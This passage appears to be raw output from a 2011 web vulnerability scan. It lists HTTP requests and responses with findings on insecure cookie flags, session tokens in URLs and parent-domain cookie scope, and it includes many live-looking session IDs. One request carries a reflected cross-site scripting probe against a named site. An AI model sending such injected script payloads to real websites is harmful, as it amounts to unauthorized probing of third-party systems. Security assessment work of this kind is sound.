HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:29 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=8431C159C7273C6E463B3FA784154B90; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40207 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:30 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=147E71C4861012CE4C15BE879164BC54; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40209 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:33 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=7B2969C78BCECF40F36FB4F43586FADB; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40533 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:34 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=1E9F062E280FCF6E94897547E2F872A5; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: affiliates.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Rackspace Cloud Affiliate Program ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:08:03 GMT Server: Apache Set-Cookie: JSESSIONID=A7BE43B9F2A2C99949EA16FFD7EA773F; Path=/ Set-Cookie: lr=null; Domain=login.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:08:03 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /register.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:08:03 GMT Server: Apache Set-Cookie: JSESSIONID=638DAE29E54D3B65DC1E863BC5F6451F; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:08:03 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 14688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /requestPasswordReset.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=2&ab=0; JSESSIONID=8080169631484995FA78998C7A2FA96C; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; lr=null; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; __utmb=226091973.2.10.1296921579; __qca=P0-932105070-1296921578417; wptrk=sn=htcwiki&i=1;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:45:06 GMT Server: Apache Set-Cookie: JSESSIONID=9299013497D1B060B2050DDCD017F00D; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:45:06 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 6068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the secure flag set:
cpsid=0h0edc55b5reboaoagclwxnb; path=/; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /Login.aspx?reval=Log-In Error (Fields are case-sensitive) Server: Microsoft-IIS/7.5 Set-Cookie: cpsid=0h0edc55b5reboaoagclwxnb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 15:19:28 GMT Content-Length: 181
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fLogin.aspx%3freval%3dLog-In+Error+(Fields+are+case-sensitive)">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps-api-ssl.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sat, 05 Feb 2011 15:42:01 GMT Connection: close Set-Cookie: UID=296258cf-184.84.78.110-1296920521; expires=Mon, 04-Feb-2013 15:42:01 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: signup.apps.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 15:25:12 GMT Server: Apache/2.2.16 (EL) X-Powered-By: PHP/5.2.14 Set-Cookie: RACKSPACE_EA_SIGNUP=rnlbdhqan6or0lohbis5u5msc0; expires=Sat, 12-Feb-2011 15:25:12 GMT; path=/; secure P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: IS_UASrackuid=RSEAe637b439556529b6579e24418a8bbd7d; expires=Fri, 06-May-2011 15:25:12 GMT; path=/; domain=.rackspace.com Set-Cookie: IS_UASrackuid=RSEA97b6b0ea13f671bf95253b1627351fbf; expires=Fri, 06-May-2011 15:25:12 GMT; path=/; domain=.rackspace.com Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="X-UA-Compatible ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
symfony=asi2pdkfuampt70u2huh62lk35; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signup HTTP/1.1 Host: signup.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Mosso Engineering) Content-Type: text/html; charset=utf-8 Date: Sat, 05 Feb 2011 15:25:19 GMT Keep-Alive: timeout=15, max=149 Connection: close Set-Cookie: symfony=asi2pdkfuampt70u2huh62lk35; path=/ X-Powered-By: PHP/5.2.6 Content-Length: 17012
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /page/Smartphone+ROMs HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:00:20 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=4B8C85709C6AFD21174C5CE4D8F87165; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:00:20 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 142277
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords ...[SNIP]... <div align="center"> You can also use <a href="https://www.paypal.com/ca/cgi-bin/webscr?cmd=_flow&SESSION=yk9kRMEwntxWONvVz5hDfJdQ4Ab84eC72ypDIk-pwcTkpw7GO4KCZ1u_aCe&dispatch=5885d80a13c0db1ffc45dc241d84e9538c532da79baccf7c26f850d773643350" target="_self">this </a> ...[SNIP]...
Request
GET /login.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:08:03 GMT Server: Apache Set-Cookie: JSESSIONID=A7BE43B9F2A2C99949EA16FFD7EA773F; Path=/ Set-Cookie: lr=null; Domain=login.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:08:03 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
Request
GET /register.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:08:03 GMT Server: Apache Set-Cookie: JSESSIONID=638DAE29E54D3B65DC1E863BC5F6451F; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:08:03 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 14688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
Request
GET /pages/Login.jsp HTTP/1.1 Host: manage.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=147D97DD3FF5D17C3E11EB54069F4748.manage-n01; Path=/; Secure Content-Type: text/html;charset=ISO-8859-1 Date: Sat, 05 Feb 2011 15:21:41 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
Request
GET /news/software/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32451
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <h1> <a href="/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-logo"><img src="http://i.cmpnet.com/infoweek/logos/iw_logo_2009_365.gif" alt="InformationWeek" title="InformationWeek" class="brand" /> ...[SNIP]... </h1> <a href="/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-logo"><img src="http://i.cmpnet.com/infoweek/logos/iw_tagline_2009.gif" alt="The Business Value Of Technology" title="The Business Value Of Technology" class="tagline" /> ...[SNIP]... <div class="account">Welcome Guest. <a href="/GLOBAL/btg/iwbtn/user/login.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?keycode=IWKREG&siteId=300001&successfulLoginRedirect=http%3A//www.informationweek.com/news/software/hosted/showArticle.jhtml%3FarticleID%3Dnull&jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" rel="nofollow" class="first">Log In</a> <a href="/GLOBAL/btg/iwbtn/user/register.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?keycode=IWKREG&siteId=300001&successfulLoginRedirect=http%3A//www.informationweek.com/news/software/hosted/showArticle.jhtml%3FarticleID%3Dnull" class="last" rel="nofollow">Register</a> <a href="/GLOBAL/misc/member.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Benefits</a> ...[SNIP]... <div id="h-iwSelect"> <a href="http://www.informationweek.com/ipad/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-spot-ipad"><img src="http://i.cmpnet.com/infoweek/promo/ipad_header_promo_v2.gif" width="201" height="48" hspace="0" vspace="0" border="0" alt="InformationWeek Select - Our New iPad Application" title="Informatio ...[SNIP]... 
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.brinked.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php?"><script>alert(9)</script> HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.brinked.com
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /goat.php?cID=1055&cdid=5144&campID=8&ic_cat=&ic_type=&ic_bu=&ic_bc=&ic_ch=&ic_nso=&altid=US1ffb86d7e6309d5032693db6bb0255e1&refVar= HTTP/1.1 Host: 1055.ic-live.com Proxy-Connection: keep-alive Referer: http://www.rackspacecloud.com/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ngx_userid=173.193.214.243:1296740518348; pid2=1296740518pY/IXAQ3yw3x99; cvt515=114031401
Response
HTTP/1.1 302 Found
Server: pixeld
Content-Type: text/plain
Date: Sat, 05 Feb 2011 15:17:38 GMT
Last-Modified: Sat, 05 Feb 2011 15:17:38 GMT
Accept-Ranges: bytes
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: sid1055=1296919058yK8mJ7gX4wX1; domain=.ic-live.com;
Location: /goat.php?cID=1055&cdid=5144&campID=8&ic_cat=&ic_type=&ic_bu=&ic_bc=&ic_ch=&ic_nso=&altid=US1ffb86d7e6309d5032693db6bb0255e1&refVar=&checkcookie=1&oldsid=1296919058yK8mJ7gX4wX1&docurl=aHR0cDovL3d3dy5yYWNrc3BhY2VjbG91ZC5jb20vaW5kZXgucGhw
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
sid0=1296919303rM7wN0uL4qQ5; domain=.ic-live.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /goat.php HTTP/1.1
Host: 1055.ic-live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid1055=1296919058yK8mJ7gX4wX1; ngx_userid=173.193.214.243:1296740518348; cvt515=114031401; pid2=1296740518pY/IXAQ3yw3x99;
Response
HTTP/1.1 302 Found
Server: pixeld
Content-Type: text/plain
Date: Sat, 05 Feb 2011 15:21:43 GMT
Last-Modified: Sat, 05 Feb 2011 15:21:43 GMT
Accept-Ranges: bytes
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: sid0=1296919303rM7wN0uL4qQ5; domain=.ic-live.com;
Location: /goat.php&checkcookie=1&oldsid=1296919303rM7wN0uL4qQ5
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=admeldae&adSpace=segment5ron7&tagKey=4284263595&th=24653211015&tKey=aOmn6ypVMqotYK2q3i2tiFudZblZbX&size=160x600&p=4175931&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2Fsearch%2Feverything%2Fthread%3Fcontains%3Dthread&f=1&rnd=4177843 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/160x600/technology-atf?t=1296924234264&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2Fsearch%2Feverything%2Fthread%3Fcontains%3Dthread&refer=http%3A%2F%2Fburp%2Fshow%2F38
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=afngMQmgeEZbPjNuDbDALMmo3LxrsNVq85RU9CrIRUZdxZbLMffS8EeYEZcn7pmUup0yajdeDSkVYIueQUTiTZacRIsdoZaTZbRu4twS2KZcwtZbZdALWY81S9VokXwhGSM2VQaO81ZcCko5T0jO7Qu5G2w0ZdTX4aveAgO3hJ5uU0piogYtjwwHuOWAZdA8uuymtIdQDHo0auQqYNTSw17GstnLXm80eVQopCBdLleZcT4pVTLyW8vfvBLUwMx6NK7HPOyBqf6NcaTN5bmuWO3YZd0H5ZauZcJflu0fLZawJL4RDPv6APyHPq8yvYFL1aB95ZblqR4AFiQ7lZa6jwA88tV0txbtrWXo7hpW4O1M76uwOZaydmrGbZcqsSJnjZdJ98yF9liKpFeuChMCQZbl7LxTf2Mn2WbF3UnvMPvl4mZdlNG236hTKeVTZbl6c7QOXwEyDiM1gkX1cHcRPFYSYMnIrimGSUQGMhxZbrK
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /server/ads.js?pub=6552261&cch=6553220&code=6554751&l=728x90&aid=25478846&ahcid=644815&bimpd=5RYIcSzcZ3YVc3Xmn1v6D12fgxoMZ_KxYaGHrJIk6w4vL2w4olBgZlcwX-dfSgko6HDZxnsmrr47Obp5SaAxhaWtejM1oKx9QhYTUwPwtNKBMLFYxb2xM7L9ijs99d1ugjauT2d9OwYgSUGCBVCSDBA8RKHDwnb6YyAiXdTaEUKKYyoJCu690_v7VpvZCDjUaKJtXRsJH9xiIAFWKpwwM6UKT5iIY2cCh4o0tzZIqH-QoZWIeSd46jAx302zPvjENdQJQ3lxJmiG3xwERk51EwRDwJvkeElJ0kedc5pYI2g5SKdz39rSLSTWocZyVeeF7ql5U8dtGEkuqVxzMGVpJH8T-ZNFEU-nOUpnOCu9QLW6GijLKm6S4m4J2fUPbtSxkcNYq2VuxeX6OfYPUyBZcqDsMS9X-ilW5sENh-d4wjE4YSkth278wvcJbt8t2bntfdFR9R2deteLfRAQWVOy3LRNf6UxlXDZ3bwY5OTvFqTA1c6M99vGyI-JTgtVkKU_-gTnqRHH7p3tSij6x55gE8GV3EQmUWZL1qF4AqtpmSku1oehzJHvQLZhAry7fGCDbPDC_UsTdQlbYxb3dg3wgqohEMsFISfvjV_1K2LXvTMeR9vPL1IBCZu1g6Tc8JYuNVt2lXohf7sOVYPfDrMXhw6e0ejzFihvNy98WKBwGnOlER_WzsdjlkS_niAQAk_DTV2G0EBCwswsTXB9DnU_Xwv1TTF4CsEb1q3yNhJPgzs&acp=2.16 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; 